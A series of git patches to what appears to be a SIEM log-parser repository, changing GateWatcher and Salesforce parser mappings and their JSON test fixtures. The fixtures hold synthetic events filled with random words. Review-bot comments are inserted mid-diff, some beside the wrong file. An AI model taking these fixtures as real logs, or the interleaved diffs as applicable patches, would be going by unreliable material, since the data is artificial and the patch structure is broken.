\"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, 
\"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": \"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", 
\"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": 
\"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, 
\"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}", + "event": { + "action": "stop", + "category": [], + "outcome": "failure", + "provider": "foo canada biodiversity", + "reason": "gear technologies garlic", + "severity": 3, + "start": "2024-11-12T08:21:47.936000Z", + "type": [] + }, + "@timestamp": "2024-11-12T08:21:47.936000Z", + "file": { + "directory": "vg tunisia river/favorite.wsf", + "hash": { + "sha1": "9280AE13A255F18D841739D0D18222BB950C8FC7" + }, + "name": "developmental.otf", + "path": "vg tunisia river/favorite.wsf/developmental.otf", + "type": "Regular File" + }, + "host": { + "id": "29092d44-a0cf-11ef-8baa-0242ac110007", + "risk": { + "static_level": "Critical" + }, + "type": "IDS" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Stop", + "class_name": "Windows Service Activity", + "class_uid": 201004, + "process": { + "parent": { + "user": { + "full_name": "Roland Nichol" + } + }, + "user": { + "domain": "tuition gst cheese", + "full_name": "Lynsey Sherise", + "groups": [ + { + "name": "overview friendly ul" + } + ] + } + } + }, + "process": { + "command_line": "hdtv il murder", + "entity_id": "2909c8d0-a0cf-11ef-82af-0242ac110007", + "name": "Don", + "parent": { + "command_line": "bull retailers sensitivity", + "end": "2024-11-12T08:21:47.935000Z", + "entity_id": "290a756e-a0cf-11ef-86a9-0242ac110007", + "name": "Indoor", + "pid": 29, + "start": "2024-11-12T08:21:47.900000Z", + "user": { + "id": [ + "290a520a-a0cf-11ef-a44f-0242ac110007" + ], + "name": "Asian" + } + }, + "pid": 38, + 
"start": "2024-11-12T08:21:47.895000Z",
+ "user": {
+ "id": [
+ "2909b99e-a0cf-11ef-946c-0242ac110007"
+ ],
+ "name": "Journal"
+ }
+ },
+ "related": {
+ "hash": [
+ "9280AE13A255F18D841739D0D18222BB950C8FC7"
+ ],
+ "user": [
+ "Hearing"
+ ]
+ },
+ "user": {
+ "domain": "thinking answered refurbished",
+ "id": "290fefee-a0cf-11ef-ba87-0242ac110007",
+ "name": "Hearing"
+ }
+ }
+}
\ No newline at end of file
From b03ca79d59d45dcd12914df6cd8e3532e5912016 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet
Date: Tue, 12 Nov 2024 10:23:11 +0100
Subject: [PATCH 019/150] Fixing parsed_date to match with detection and not analysis
---
 GateWatcher/aioniq/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 45330587a..ba98a034e 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -10,7 +10,7 @@ pipeline:
 external:
 name: date.parse
 properties:
- input_field: "{{json_load.message.timestamp_analyzed}}"
+ input_field: "{{json_load.message.timestamp_detected}}"
 output_field: datetime
 format: null
 timezone: UTC
From 19383dc28b0a3a0e9a42995cf66cd68f11194583 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet
Date: Tue, 12 Nov 2024 11:43:06 +0100
Subject: [PATCH 020/150] Parsing of TLS metadata using ECS tls.server.* fields and two custom fields
---
 GateWatcher/aioniq/_meta/fields.yml | 12 ++++++++----
 GateWatcher/aioniq/ingest/parser.yml | 14 +++++++++++++-
 2 files changed, 21 insertions(+), 5 deletions(-)
diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index d0d85f7f6..7fb7e28af 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
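Review bot: Replacing `timestamp_analyzed` with `timestamp_detected` as the sole source of `@timestamp` discards the analysis time, and for retrohunt events the two differ by days (the retrohunt fixture updated in the next commit moves from 2023-06-12 to 2023-06-09), so an alert can now arrive with an `@timestamp` older than the lookback window of time-bounded detection rules and be missed. Keep the analysis time queryable by mapping it to a second field, e.g. `event.created: "{{json_load.message.timestamp_analyzed}}"` in the stage that sets the common fields. Whether every module emits `timestamp_detected` is not visible here; if one does not, `date.parse` with `format: null` receives an empty input, so a `filter: "{{json_load.message.timestamp_detected != None}}"` on this action is worth adding. The enclosing `pipeline` action list continues outside the hunk.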
@@ -384,10 +384,14 @@ gatewatcher.tlp:
 name: gatewatcher.tlp
 type: text
 
-gatewatcher.tls:
- description: This field represents the tls field in a network metadata (used in
- legacy format log)
- name: gatewatcher.tls
+gatewatcher.tls.sni:
+ description: This field represents the TLS SNI field in a TLS metadata
+ name: gatewatcher.tls.sni
+ type: text
+
+gatewatcher.tls.fingerprint:
+ description: This field represents the TLS server fingerprint field in a TLS metadata
+ name: gatewatcher.tls.fingerprint
 type: text
 
 gatewatcher.ttp:
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index ba98a034e..b71064e6d 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -29,6 +29,8 @@ pipeline:
 description: DGA
 - name: retrohunt
 description: Retrohunt
+ - name: tls
+ description: TLS
 stages:
 common:
 actions:
@@ -122,7 +124,6 @@ stages:
 gatewatcher.sip: "{{json_load.message.sip}}"
 gatewatcher.smb: "{{json_load.message.smb}}"
 gatewatcher.ssh: "{{json_load.message.ssh}}"
- gatewatcher.tls: "{{json_load.message.tls}}"
 file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
 gatewatcher.dhcp: "{{json_load.message.dhcp}}"
 gatewatcher.dnp3: "{{json_load.message.dnp3}}"
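Review bot: Dropping `gatewatcher.tls` from the `common` stage with nothing in its place is a breaking change for every saved search and detection rule keyed on that field, and neither the hunk nor the commit message says so. The sibling protocol objects (`gatewatcher.ssh`, `gatewatcher.smb`, `gatewatcher.dhcp`, `gatewatcher.dnp3`) remain in `common`, so if the sensor embeds a `tls` object in events of other types, those events now lose their TLS data unless the new `tls` stage also runs for them — how stages are selected is outside the hunk, so please confirm. At minimum record the removal in the changelog; a one-release deprecation that keeps `gatewatcher.tls: "{{json_load.message.tls}}"` alongside the new fields would be safer for existing rules.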
@@ -202,3 +203,14 @@ stages:
 gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}"
 gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}"
 gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}"
+ tls:
+ actions:
+ - set:
+ tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+ tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+ tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+ tls.server.subject: "{{json_load.message.tls.subject}}"
+ gatewatcher.tls.sni: "{{json_load.message.tls.sni}}"
+ gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}"
+ tls.version: "{{json_load.message.tls.version}}"
+ tls.server.not_after: "{{json_load.message.tls.notafter}}"
From dabf885f938ac4fb194fce490569c8689ef40983 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet
Date: Tue, 12 Nov 2024 11:52:07 +0100
Subject: [PATCH 021/150] Updated tests
---
 GateWatcher/aioniq/tests/codebreaker.json | 2 +-
 GateWatcher/aioniq/tests/dga.json | 2 +-
 GateWatcher/aioniq/tests/malcore.json | 2 +-
 GateWatcher/aioniq/tests/retrohunt.json | 2 +-
 GateWatcher/aioniq/tests/sigflow-alert.json | 2 +-
 GateWatcher/aioniq/tests/sigflow-file.json | 2 +-
 GateWatcher/aioniq/tests/sigflow-meta.json | 2 +-
 7 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
index f16f95623..6d7eb789a 100644
--- a/GateWatcher/aioniq/tests/codebreaker.json
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -17,7 +17,7 @@
 "module": "powershell",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:32:50.269000Z",
+ "@timestamp": "2023-03-22T10:30:37.145000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
index b9db082ca..9d702ce4d 100644
--- a/GateWatcher/aioniq/tests/dga.json
+++ b/GateWatcher/aioniq/tests/dga.json
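Review bot: The two custom fields duplicate ECS fields that exist for exactly this data, so GateWatcher TLS metadata will not correlate with the same attributes from other sources: SNI belongs in `tls.client.server_name`, and the server certificate fingerprint in `tls.server.hash.sha1` (or `.sha256`, depending on which digest the sensor emits — not visible here), ideally also appended to `related.hash`. `tls.server.not_before` and `tls.server.not_after` are date fields in ECS, but the hunk copies `notbefore`/`notafter` verbatim instead of routing them through the `date.parse` action the pipeline already uses for `@timestamp`, so unless the source already emits ISO 8601 they will index as text or be rejected. `tls.version` in ECS is the bare number (`1.2`) with the protocol name in `tls.version_protocol`; if the sensor sends a combined string such as `TLS 1.2`, it needs splitting. I would replace the two custom lines with `tls.client.server_name: "{{json_load.message.tls.sni}}"` and `tls.server.hash.sha1: "{{json_load.message.tls.fingerprint}}"` and drop the new `gatewatcher.tls.*` declarations.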
@@ -17,7 +17,7 @@
 "module": "dga",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:46:08.487000Z",
+ "@timestamp": "2023-03-22T10:25:54.903000Z",
 "destination": {
 "address": "pgoadcmgqfacj.com",
 "domain": "pgoadcmgqfacj.com",
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index ba95cc211..b5d0a4f69 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -20,7 +20,7 @@
 "info"
 ]
 },
- "@timestamp": "2023-03-22T10:53:13.408000Z",
+ "@timestamp": "2023-03-22T10:35:22.615000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
index fd29bcfa4..7c8728304 100644
--- a/GateWatcher/aioniq/tests/retrohunt.json
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -17,7 +17,7 @@
 "module": "retrohunt",
 "severity": 1
 },
- "@timestamp": "2023-06-12T10:12:39.001000Z",
+ "@timestamp": "2023-06-09T14:08:46.845000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index 1de9534f5..626ee8eb7 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -19,7 +19,7 @@
 "module": "alert",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:44:08.001000Z",
+ "@timestamp": "2023-03-22T10:25:55.690000Z",
 "destination": {
 "address": "2.2.2.2",
 "bytes": 90364,
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
index 2e1580dce..7e9cc8b6a 100644
--- a/GateWatcher/aioniq/tests/sigflow-file.json
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
@@ -16,7 +16,7 @@
 ],
 "module": "fileinfo"
 },
- "@timestamp": "2023-03-22T10:44:07.998000Z",
+ "@timestamp": "2023-03-22T10:25:55.469000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
index 4da5dbc30..6e8cba037 100644
--- a/GateWatcher/aioniq/tests/sigflow-meta.json
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -16,7 +16,7 @@
 ],
 "module": "http"
 },
- "@timestamp": "2023-03-22T10:44:07.997000Z",
+ "@timestamp": "2023-03-22T10:25:55.377000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
From 9336df505b67a0453815a0e29b09800fa904a387 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev"
Date: Tue, 12 Nov 2024 13:19:50 +0200
Subject: [PATCH 022/150] Fix: Salesforce login event
---
 .../salesforce-events/ingest/parser.yml | 9 +++
 .../tests/salesforce_complete_event.json | 6 +-
 .../tests/salesforce_complete_event_1.json | 6 +-
 .../tests/salesforce_login_event.json | 9 +++
 .../tests/salesforce_login_event_1.json | 69 +++++++++++++++++++
 .../tests/session_integrity.json | 14 ++--
 6 files changed, 107 insertions(+), 6 deletions(-)
 create mode 100644 Salesforce/salesforce-events/tests/salesforce_login_event_1.json
diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml
index 01b66855f..54db25d6c 100644
--- a/Salesforce/salesforce-events/ingest/parser.yml
+++ b/Salesforce/salesforce-events/ingest/parser.yml
@@ -147,6 +147,14 @@ stages:
 user.name: "{{json_event.output.USERNAME}}"
 filter: "{{json_event.output.USERNAME != None}}"
 
+ - set:
+ user.name: "{{json_event.output.USER_NAME}}"
+ filter: "{{json_event.output.USER_NAME != None and '@' not in json_event.output.USER_NAME}}"
+
+ - set:
+ user.email: "{{json_event.output.USER_NAME}}"
+ filter: "{{json_event.output.USER_NAME != None and '@' in json_event.output.USER_NAME}}"
+
 - set:
 user.email: "{{json_event.output.USER}}"
 filter: "{{json_event.output.USER != None}}"
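Review bot: Routing `USER_NAME` to `user.email` whenever it contains `@` leaves `user.name` — and therefore `related.user` — empty for login events, which the new `salesforce_login_event_1.json` fixture confirms (`user` carries only `email` and `id`, `related` only `ip`). Salesforce usernames are required to be email-formatted even when they are not deliverable mailboxes, so the `@` test is true for essentially every login, the first `set` will almost never fire, and the identifier analysts pivot on across login, logout and API events goes unpopulated. Set `user.name: "{{json_event.output.USER_NAME}}"` with just `filter: "{{json_event.output.USER_NAME != None}}"` and keep the second `set` as an additional `user.email` copy. Note also that the following context `set` of `user.email` from `USER` runs afterwards and overwrites the `USER_NAME`-derived value when both keys are present; if that precedence is intended, a one-line comment saying so would save the next reader a check.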
@@ -201,6 +209,7 @@ stages:
 tls.cipher: "{{json_event.output.CIPHER_SUITE}}"
 tls.version: "{{json_event.output.TLS_PROTOCOL}}"
+ url.original: "{{json_event.output.LOGIN_URL}}"
 host.id: "{{json_event.output.DEVICE_ID}}"
 host.os.name: "{{json_event.output.OS_NAME}}"
 host.os.version: "{{json_event.output.OS_VERSION}}"
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event.json b/Salesforce/salesforce-events/tests/salesforce_complete_event.json
index 03b6811ee..ceeb7b881 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event.json
@@ -45,6 +45,9 @@
 "related": {
 "ip": [
 "1.2.3.4"
+ ],
+ "user": [
+ "test_user"
 ]
 },
 "salesforce": {
@@ -119,7 +122,8 @@
 "query": "queryParam1=val1&queryParam2=val2"
 },
 "user": {
- "id": "00530000009M943"
+ "id": "00530000009M943",
+ "name": "test_user"
 },
 "user_agent": {
 "device": {
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
index 051638d22..89c90352a 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
@@ -45,6 +45,9 @@
 "related": {
 "ip": [
 "1.2.3.4"
+ ],
+ "user": [
+ "test_user"
 ]
 },
 "salesforce": {
@@ -115,7 +118,8 @@
 "path": "/sObject/0064100000JXITSAA5/view"
 },
 "user": {
- "id": "00530000009M943"
+ "id": "00530000009M943",
+ "name": "test_user"
 },
 "user_agent": {
 "name": "Chrome",
diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event.json b/Salesforce/salesforce-events/tests/salesforce_login_event.json
index e87c6f5a9..7719dc746 100644
--- a/Salesforce/salesforce-events/tests/salesforce_login_event.json
+++ b/Salesforce/salesforce-events/tests/salesforce_login_event.json
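Review bot: `LOGIN_URL` is a bare host in the Salesforce Login event — the new fixture carries `test.my.salesforce.com` — so placing it in `url.original` yields no `url.domain` (that fixture's expected `url` has only `original` and `path`), whereas the older fixture with `https://login.salesforce.com` gets the full domain breakdown. The same `url` object already holds `url.path` from `URI` (`/services/oauth2/token`), so after this change `url.original` and `url.path` describe two different things inside one event. I would keep the request URI in `url.*` and store the login endpoint under the existing custom namespace, e.g. `salesforce.login.url: "{{json_event.output.LOGIN_URL}}"` (declared in fields.yml), or at least also set `url.domain` when the value carries no scheme so it stays pivotable. This `set` block starts outside the hunk.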
@@ -28,6 +28,15 @@
 "address": "192.168.0.1",
 "ip": "192.168.0.1"
 },
+ "url": {
+ "domain": "login.salesforce.com",
+ "original": "https://login.salesforce.com",
+ "port": 443,
+ "registered_domain": "salesforce.com",
+ "scheme": "https",
+ "subdomain": "login",
+ "top_level_domain": "com"
+ },
 "user": {
 "email": "john.doe@example.com"
 }
diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event_1.json b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json
new file mode 100644
index 000000000..ed22aefee
--- /dev/null
+++ b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json
@@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}" + }, + "expected": { + "message": 
"{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "Login", + "type": [ + "start" + ] + }, + "@timestamp": "2034-02-21T02:43:24.464103Z", + "organization": { + "id": "ORG_ID_TEST" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "salesforce": { + "api": { + "version": "9998.0" + }, + "login": { + "key": "xxxxxxxxxxxxx", + "status": "LOGIN_NO_ERROR", + "sub_type": "oauthclientcredentials" + }, + "request": { + "id": "request_id_test" + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "tls": { + "cipher": "TLS_AES_256_GCM_SHA384", + "version": "TLSv1.3" + }, + "url": { + "original": "test.my.salesforce.com", + "path": "/services/oauth2/token" + }, + "user": { + "email": "user.integration@test.com", + "id": "USER_ID_TEST" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.28.0", + "os": { + "name": "Other" + }, + "version": "2.28" + } + } +} \ 
